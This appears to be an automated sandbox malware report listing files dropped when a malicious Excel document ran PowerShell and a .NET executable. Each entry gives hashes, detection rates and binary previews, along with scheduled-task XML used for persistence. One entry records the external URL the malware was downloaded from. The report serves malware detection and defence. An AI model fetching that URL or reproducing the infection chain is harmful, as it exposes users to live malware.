                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):899072
                                                                          Entropy (8bit):7.536155290652203
                                                                          Encrypted:false
                                                                          SSDEEP:24576:JPrXEn1XhKMgBAhXwNNXMZrHZaKJMZrQgrp1Lc:G7hXSerHZaKJMZrQgr
                                                                          MD5:CEC5782C931581F13CE3C5D5B6A948A2
                                                                          SHA1:0C0CE04D190FEC3265DF430F6D3DC58FBB979653
                                                                          SHA-256:91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
                                                                          SHA-512:CD3F9FB083204E3662300F3DC73701BA49FCB6975EE7E31458F0364CF98384F65E4E1BAF9049746ACEE529AD9BF663F4100B112D9ACA7A8BDF8750282A4F5AF0
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: Metadefender, Detection: 19%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 30%
                                                                          Joe Sandbox View:
                                                                          • Filename: dpR3o92MH1.exe, Detection: malicious, Browse
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d._..............0.............n.... ........@.. ....................... ............@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H...................=...0...P...........................................p.WD^S\`.].4._.x..v..?)0o..8.U_`.........I..P..+.}.....K.gC.....L...Fb..._<y....KF..a!f..O[_.?`.gvl.0....F......(....3_.h.4.7W_."......7.d.nD.B.;..}.i./.C...O.:.\.S..7}...g@..FJ..`6!..P.~.,.).gF..Ow.....r..7yE.Q.......Q.A#..!(..M...P....'b\.\...S...h\..$.qP..oV.b:.'.!.Sn..q.>,g....x..M``...S.....R.O..Zwp@)...... R...../Ea=.`t.}h.....}bZ...P.&5S.........fd.|...,.........XM..
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe
                                                                          Process:C:\Users\user\AppData\Roaming\sp.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:downloaded
                                                                          Size (bytes):899072
                                                                          Entropy (8bit):7.536155290652203
                                                                          Encrypted:false
                                                                          SSDEEP:24576:JPrXEn1XhKMgBAhXwNNXMZrHZaKJMZrQgrp1Lc:G7hXSerHZaKJMZrQgr
                                                                          MD5:CEC5782C931581F13CE3C5D5B6A948A2
                                                                          SHA1:0C0CE04D190FEC3265DF430F6D3DC58FBB979653
                                                                          SHA-256:91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
                                                                          SHA-512:CD3F9FB083204E3662300F3DC73701BA49FCB6975EE7E31458F0364CF98384F65E4E1BAF9049746ACEE529AD9BF663F4100B112D9ACA7A8BDF8750282A4F5AF0
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Metadefender, Detection: 19%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 30%
                                                                          Joe Sandbox View:
                                                                          • Filename: dpR3o92MH1.exe, Detection: malicious, Browse
                                                                          IE Cache URL:http://gtp.bg/opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d._..............0.............n.... ........@.. ....................... ............@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H...................=...0...P...........................................p.WD^S\`.].4._.x..v..?)0o..8.U_`.........I..P..+.}.....K.gC.....L...Fb..._<y....KF..a!f..O[_.?`.gvl.0....F......(....3_.h.4.7W_."......7.d.nD.B.;..}.i./.C...O.:.\.S..7}...g@..FJ..`6!..P.~.,.).gF..Ow.....r..7yE.Q.......Q.A#..!(..M...P....'b\.\...S...h\..$.qP..oV.b:.'.!.Sn..q.>,g....x..M``...S.....R.O..Zwp@)...... R...../Ea=.`t.}h.....}bZ...P.&5S.........fd.|...,.........XM..
                                                                          C:\Users\user\AppData\Local\Temp\1CDE0000
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):218510
                                                                          Entropy (8bit):7.935014690411741
                                                                          Encrypted:false
                                                                          SSDEEP:6144:nr0IUBvQUkM6fWRFTcf35skaMNVMTV5GcQgXYr1X:nZ6vQVpfWvTG5kS6T3JXy
                                                                          MD5:75752E30ED1F77084DEBBE7086F0D747
                                                                          SHA1:052B0B10B628CE6C96AA5DDCF41E151878D34BD3
                                                                          SHA-256:17E4318041BB1C43FBECD46F93E67D79710C10241BF10B4FB16AEF6EAD905D77
                                                                          SHA-512:60E39B0E2C712966751617C2ED02438F49BC825912FB8072524D2338B851A10F2D4C502355AFCBB6D2010E4B7984315A5093ED228A89B211F476C310C965A0F0
                                                                          Malicious:false
                                                                          Preview: ...N.0...H.C.+J\8 ..r.e......=M...<..g...U...DI..~..xfz...x....]V.V..^i.....Oy..L.)a.........l.....U;.Y.R...e.V`..8ZY.hE.... .R4..&.k..K.R....M..B..T.....\;V..|.Q5.!.-E"....H...-Ay.jI...A(l..5U.....R..!.{..5;Lm...~.E..;%#6..*....xAa. ..9.u....VP<....Ki...>.../.a.....V.L.%VY!..wbn..v......R..n/O../..\.XO;...L.......D..xw=f...:.. ...<".a......[.A=%j.....=.CE.-....s..4U...H.+.....|....AL..]....D.'..wf!.@.a.n..>.......PK..........!....-............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Local\Temp\Cab9A5D.tmp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                          Category:dropped
                                                                          Size (bytes):58936
                                                                          Entropy (8bit):7.994797855729196
                                                                          Encrypted:true
                                                                          SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                          MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                          SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                          SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                          SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                          Malicious:false
                                                                          Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                          C:\Users\user\AppData\Local\Temp\Tar9A5E.tmp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):152533
                                                                          Entropy (8bit):6.31602258454967
                                                                          Encrypted:false
                                                                          SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                          MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                          SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                          SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                          SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                          Malicious:false
                                                                          Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                          C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe
                                                                          Process:C:\Users\user\AppData\Roaming\sp.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):899072
                                                                          Entropy (8bit):7.536155290652203
                                                                          Encrypted:false
                                                                          SSDEEP:24576:JPrXEn1XhKMgBAhXwNNXMZrHZaKJMZrQgrp1Lc:G7hXSerHZaKJMZrQgr
                                                                          MD5:CEC5782C931581F13CE3C5D5B6A948A2
                                                                          SHA1:0C0CE04D190FEC3265DF430F6D3DC58FBB979653
                                                                          SHA-256:91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
                                                                          SHA-512:CD3F9FB083204E3662300F3DC73701BA49FCB6975EE7E31458F0364CF98384F65E4E1BAF9049746ACEE529AD9BF663F4100B112D9ACA7A8BDF8750282A4F5AF0
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: Metadefender, Detection: 19%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 30%
                                                                          Joe Sandbox View:
                                                                          • Filename: dpR3o92MH1.exe, Detection: malicious, Browse
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d._..............0.............n.... ........@.. ....................... ............@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H...................=...0...P...........................................p.WD^S\`.].4._.x..v..?)0o..8.U_`.........I..P..+.}.....K.gC.....L...Fb..._<y....KF..a!f..O[_.?`.gvl.0....F......(....3_.h.4.7W_."......7.d.nD.B.;..}.i./.C...O.:.\.S..7}...g@..FJ..`6!..P.~.,.).gF..Ow.....r..7yE.Q.......Q.A#..!(..M...P....'b\.\...S...h\..$.qP..oV.b:.'.!.Sn..q.>,g....x..M``...S.....R.O..Zwp@)...... R...../Ea=.`t.}h.....}bZ...P.&5S.........fd.|...,.........XM..
                                                                          C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
                                                                          Process:C:\Users\user\AppData\Roaming\sp.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):899072
                                                                          Entropy (8bit):7.536155290652203
                                                                          Encrypted:false
                                                                          SSDEEP:24576:JPrXEn1XhKMgBAhXwNNXMZrHZaKJMZrQgrp1Lc:G7hXSerHZaKJMZrQgr
                                                                          MD5:CEC5782C931581F13CE3C5D5B6A948A2
                                                                          SHA1:0C0CE04D190FEC3265DF430F6D3DC58FBB979653
                                                                          SHA-256:91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
                                                                          SHA-512:CD3F9FB083204E3662300F3DC73701BA49FCB6975EE7E31458F0364CF98384F65E4E1BAF9049746ACEE529AD9BF663F4100B112D9ACA7A8BDF8750282A4F5AF0
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: Metadefender, Detection: 19%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 30%
                                                                          Joe Sandbox View:
                                                                          • Filename: dpR3o92MH1.exe, Detection: malicious, Browse
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d._..............0.............n.... ........@.. ....................... ............@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H...................=...0...P...........................................p.WD^S\`.].4._.x..v..?)0o..8.U_`.........I..P..+.}.....K.gC.....L...Fb..._<y....KF..a!f..O[_.?`.gvl.0....F......(....3_.h.4.7W_."......7.d.nD.B.;..}.i./.C...O.:.\.S..7}...g@..FJ..`6!..P.~.,.).gF..Ow.....r..7yE.Q.......Q.A#..!(..M...P....'b\.\...S...h\..$.qP..oV.b:.'.!.Sn..q.>,g....x..M``...S.....R.O..Zwp@)...... R...../Ea=.`t.}h.....}bZ...P.&5S.........fd.|...,.........XM..
                                                                          C:\Users\user\AppData\Local\Temp\tmp4F59.tmp
                                                                          Process:C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1618
                                                                          Entropy (8bit):5.147009800458037
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBOtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3W
                                                                          MD5:0BFDA9894AAFFAF34BB10F004BF8F1C2
                                                                          SHA1:9E4F5B33AC9D103010D4022D6791EAA642ED4B7B
                                                                          SHA-256:80E40CFA1E7998CC9694B7E4E37EBDDD90050A5B0547155CC9D90A66CDEA7304
                                                                          SHA-512:3B59BAFB9ED6E0B148C34B5CDC83A069359A8E73C2C616A5033694AEC212C3437CB99320B40626F51A8A1A6024B1063271D82AD2BF3F64A24D8411C30937DCA1
                                                                          Malicious:false
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                          C:\Users\user\AppData\Local\Temp\tmpC70.tmp
                                                                          Process:C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1618
                                                                          Entropy (8bit):5.147009800458037
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBOtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3W
                                                                          MD5:0BFDA9894AAFFAF34BB10F004BF8F1C2
                                                                          SHA1:9E4F5B33AC9D103010D4022D6791EAA642ED4B7B
                                                                          SHA-256:80E40CFA1E7998CC9694B7E4E37EBDDD90050A5B0547155CC9D90A66CDEA7304
                                                                          SHA-512:3B59BAFB9ED6E0B148C34B5CDC83A069359A8E73C2C616A5033694AEC212C3437CB99320B40626F51A8A1A6024B1063271D82AD2BF3F64A24D8411C30937DCA1
                                                                          Malicious:false
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                          C:\Users\user\AppData\Local\Temp\tmpCF32.tmp
                                                                          Process:C:\Users\user\AppData\Roaming\sp.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1624
                                                                          Entropy (8bit):5.159058809341545
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBRtn:cbhZ7ClNQi/rydbz9I3YODOLNdq35
                                                                          MD5:359BF301730B92B0B225003468B6AA6C
                                                                          SHA1:31FA3842FB9D68E89CFBBC23524B19A42BBA38CE
                                                                          SHA-256:0C340003316D5B8DFE00D3E7AFD7A8511A49E54D91D9077FB7235F6ABC67AF88
                                                                          SHA-512:5FD6BA9BB93B6A08704E4055DF757C34DE316B8BEC2F55E1C60EA14D0579246EC5EA06B14673F20CF3E9966904E0AF644C749AB77E43B55143CF85E187380275
                                                                          Malicious:true
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                          C:\Users\user\AppData\Roaming\JrekdQ.exe
                                                                          Process:C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):899072
                                                                          Entropy (8bit):7.536155290652203
                                                                          Encrypted:false
                                                                          SSDEEP:24576:JPrXEn1XhKMgBAhXwNNXMZrHZaKJMZrQgrp1Lc:G7hXSerHZaKJMZrQgr
                                                                          MD5:CEC5782C931581F13CE3C5D5B6A948A2
                                                                          SHA1:0C0CE04D190FEC3265DF430F6D3DC58FBB979653
                                                                          SHA-256:91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
                                                                          SHA-512:CD3F9FB083204E3662300F3DC73701BA49FCB6975EE7E31458F0364CF98384F65E4E1BAF9049746ACEE529AD9BF663F4100B112D9ACA7A8BDF8750282A4F5AF0
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: Metadefender, Detection: 19%, Browse
                                                                          Joe Sandbox View:
                                                                          • Filename: dpR3o92MH1.exe, Detection: malicious, Browse
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d._..............0.............n.... ........@.. ....................... ............@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H...................=...0...P...........................................p.WD^S\`.].4._.x..v..?)0o..8.U_`.........I..P..+.}.....K.gC.....L...Fb..._<y....KF..a!f..O[_.?`.gvl.0....F......(....3_.h.4.7W_."......7.d.nD.B.;..}.i./.C...O.:.\.S..7}...g@..FJ..`6!..P.~.,.).gF..Ow.....r..7yE.Q.......Q.A#..!(..M...P....'b\.\...S...h\..$.qP..oV.b:.'.!.Sn..q.>,g....x..M``...S.....R.O..Zwp@)...... R...../Ea=.`t.}h.....}bZ...P.&5S.........fd.|...,.........XM..
                                                                          C:\Users\user\AppData\Roaming\Logs\01-06-2021
                                                                          Process:C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):224
                                                                          Entropy (8bit):6.912521314864662
                                                                          Encrypted:false
                                                                          SSDEEP:6:tFt9VMm8kyapBMljjgo+wHT/cYXptXtSdIxn:B9CqnvUZb/cYX/3n
                                                                          MD5:93E9AE9299CD22033CF2739E5E235F72
                                                                          SHA1:269BFFC766A87B04F90D4B309B9BC391DC20C5AE
                                                                          SHA-256:6D69C80EC49D6964642C29CB54E3F134B9B723DB83DD0547A1B09153085A9749
                                                                          SHA-512:F41A300097B43DD1F44CECBE138A83DF814BE9B63B1AAB2CA8A9D0849D531048FF6E4C95D34A6F701D9012A8D8D50BFB20FC4F125FC0BCE8AB1E0ADFB49A1587
                                                                          Malicious:false
                                                                          Preview: =T.j...^.k....!.....=....C...n.]..4W.o8@_\.C?g...a.?.......e.-p|E...."p..m.N...HKn........,T.....G..$./..H.!..=..L. .G....!.W.W.......j..:.......no....s...{...m,..V..=P......f.2V.!p..".mF6D8.`..4.*.z...C..^n.SY...T
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 6 16:57:41 2021, atime=Wed Jan 6 16:57:41 2021, length=8192, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):867
                                                                          Entropy (8bit):4.479459267402207
                                                                          Encrypted:false
                                                                          SSDEEP:12:85Qk/CLgXg/XAlCPCHaXgzB8IB/4lX+WnicvbxbDtZ3YilMMEpxRljK2yTdJP9TK:85bU/XTwz6IIYexDv3qorNru/
                                                                          MD5:3E70A9BE98F423C2E1CFCAAE131A92D1
                                                                          SHA1:E027EA857C717A5195B65CDB20899F959AB51436
                                                                          SHA-256:E49B0933B533D97CBA5FCC544F1E05287AAE845C043D37F192B24FF43912AD27
                                                                          SHA-512:840C4D95A61C921C003ACFAA4B12C12BB2FB2D6B612AF668D278FF1995BE75B53ECAEAE6B0EA6B8D421426675DABAF419B056F7780298683DEC75BFD37BE592C
                                                                          Malicious:false
                                                                          Preview: L..................F...........7G.."..mU..."..mU.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....&R5...Desktop.d......QK.X&R5.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\134349\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......134349..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):98
                                                                          Entropy (8bit):4.29593984928515
                                                                          Encrypted:false
                                                                          SSDEEP:3:oyBVomMF3zd8CO8zd8CmMF3zd8Cv:dj6F3Z8sZ8UF3Z8s
                                                                          MD5:121AA7B0E15C0A2FAF081C912D00A1CF
                                                                          SHA1:DA137B4B637D550C95187F23D8860A85B5A7CB86
                                                                          SHA-256:7187575715B0E3C58A5A71F3A35094E3715F2A84B60565020E5B1C6AA2DD6832
                                                                          SHA-512:8AE109F6E0B7C2BB853DEE3016B72628F43950664FA6991E22C29BE24BE25B5A0777420490EED644BC6F9847323C4CFD24FF80578BB59FD8C836672FC13F063F
                                                                          Malicious:false
                                                                          Preview: Desktop.LNK=0..[xls]..spetsifikatsiya.LNK=0..spetsifikatsiya.LNK=0..[xls]..spetsifikatsiya.LNK=0..
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\spetsifikatsiya.LNK
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Jan 6 16:57:41 2021, atime=Wed Jan 6 16:57:41 2021, length=242176, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2078
                                                                          Entropy (8bit):4.523995257095842
                                                                          Encrypted:false
                                                                          SSDEEP:48:8yn/XT3IkE5JE2oQh2yn/XT3IkE5JE2oQ/:8K/XLIkE5G2oQh2K/XLIkE5G2oQ/
                                                                          MD5:4E69BD98AE858B2F9D9FF10AF55E8930
                                                                          SHA1:FB358FB1E86F5FF5A17FCE58A10978702A97AEB4
                                                                          SHA-256:CA80EBFAA83DBC709F9FA77C64594508DAE4ED32D91B82BE6852E698C749EDCD
                                                                          SHA-512:6FB5374D8AF55B56B35F413A40B7EF202B3A0567CD91FD7BD5C0D5F028B6114883B434CCF0A5AC26B19A3658A43800EE80BEEBE043BA0C9EF873B16FA3D6CB1C
                                                                          Malicious:false
                                                                          Preview: L..................F.... ...6.2..{.."..mU...C..mU................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.....&R3. .SPETSI~1.XLS..T.......Q.y.Q.y*...8.....................s.p.e.t.s.i.f.i.k.a.t.s.i.y.a...x.l.s.......}...............-...8...[............?J......C:\Users\..#...................\\134349\Users.user\Desktop\spetsifikatsiya.xls.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.p.e.t.s.i.f.i.k.a.t.s.i.y.a...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......134349..........D_....3N...W...9F.C.........
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\71YY0ZNRPQ4IRKSGGQ82.temp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8016
                                                                          Entropy (8bit):3.5854792121295844
                                                                          Encrypted:false
